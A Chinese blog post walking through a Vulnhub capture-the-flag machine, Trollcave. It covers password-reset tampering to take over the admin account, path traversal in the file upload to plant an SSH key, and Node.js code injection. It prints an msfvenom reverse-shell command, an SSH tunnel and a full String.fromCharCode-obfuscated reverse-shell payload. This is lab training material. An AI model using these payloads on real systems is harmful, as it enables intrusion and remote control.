vulnhub渗透日记01：trollcave

_WHOAM1

已于 2023-08-16 16:44:32 修改

阅读量98

点赞数

分类专栏： Vulnhub靶机渗透日记文章标签：安全 linux

于 2023-06-26 15:48:37 首次发布

本文链接：https://blog.csdn.net/ericalezl/article/details/131393766

版权

Vulnhub靶机渗透日记专栏收录该内容

22 篇文章 0 订阅

订阅专栏

该文详细描述了对一个名为Trollcave的靶机进行渗透测试的过程，包括信息收集、密码重置以获取其他用户权限，利用文件上传漏洞尝试SSH免密登录，以及通过Node.js服务实现反弹shell的技术步骤。

摘要由CSDN通过智能技术生成

前言

⏰时间2023.6.26
🗺️靶机地址：https://www.vulnhub.com/entry/trollcave-12,230/
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
🙏本人水平有限，如有错误望指正，感谢您的查阅！
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

首先发现目标在这里插入图片描述 128那是kali，目标是132
然后扫132开启了啥，nmap -sS -A -T4 -v -p- 192.168.58.132
80端口是这个
先扫了下目录，没发现什么，我用的dirsearch，或者dirb，那个robots.txt没啥东西进网站看看信息，在home下面有个password reset，进去提示访问password_resets
在这里插入图片描述直接访问是不行的，于是继续将其作为路径去扫目录

密码重置

访问http://192.168.58.132/password_resets/new进入重置页面在这里插入图片描述在输入框中输入xer，点击重置，得到一个链接进入页面后输入新密码，长度不小于10位，确认后直接就是登录状态
进入后看到有文件上传，但是功能没启用，无法上传，留言板无法弹cookie，标签被实体编码了
进入users发现一个king用户，是superadmin，可能是超管用户在这里插入图片描述于是想到刚才重置密码的链接，重置xer用户，链接里有个?name=xer，他是通过name传参来识别重置哪个用户的密码，可以抓包把xer改为king试试，直接改改不了，只能改普通用户，所以得抓包试退出当前xer账号，重新在重置密码页面输出重置某个用户，拿到重置链接进入，抓取输入密码提交的这个包，将其中的用户名部分改为King
在这里插入图片描述放包后进入King登录后的页面

ssh免密登录

然后如图所示开启upload 在这里插入图片描述可以直接上传一句话php，右键delete可以看到路径尝试去访问，发现他这个不解析php，此路不通
home页面下有个sudo give me sudo，点进去提示使用rails用户他这个开着22端口，结合这个文件上传可以传公钥免密登录
kali生成公钥ssh-keygen -t rsa
上传文件时看到返回的绝对路径，上传时可以设置文件名以及路径，使用…/穿越到/home/rails/.ssh/authorized_keys 在这里插入图片描述成功传到指定目录下
ssh -i id_rsa rails@192.168.58.132 ssh登录

提权

可以使用 /bin/bash -i 进入交互式在这里插入图片描述
不存在find命令suid提权查看版本信息msf中search 4.4.0-116目标不存在gcckali上编译，最后目标执行提权失败
提权失败，尝试其他方法

Node js

进入home下的king，发现calc.js，其中提及127.0.0.1：8888端口的服务

在这里插入图片描述查看当前监听端口

rails@trollcave:/home/king/calc$ netstat -antulp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:3000            0.0.0.0:*               LISTEN      1065/ruby2.3    
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN      -

文件名提示着什么
在这里插入图片描述这里用toString转化为字符串，我们可以将sum替换为反弹shell
下面用msf生成反向js

msfvenom -p nodejs/shell_reverse_tcp lhost=192.168.58.153 lport=8888 -o rev.js

再插入一句

echo '1+1;' >> rev.js

将目标内网8888与本机9999打通

ssh -L9999:localhost:8888 -i id_rsa rails@192.168.58.209 -f -N

访问本机9999

在这里插入图片描述用一段python脚本将rev.js转化成ascii码

#!/usr/bin/env python

f = open('rev.js', 'r')
encoded = ''
for c in f.read():
    encoded = encoded + ',' + str(ord(c))
print 'eval(String.fromCharCode(%s))' % encoded[1:]

┌──(root㉿Erik)-[~eric/myfile]
└─# python2 encode.py 
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,56,56,56,56,44,32,34,49,57,50,46,49,54,56,46,53,56,46,49,53,51,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59,10))

在这里插入图片描述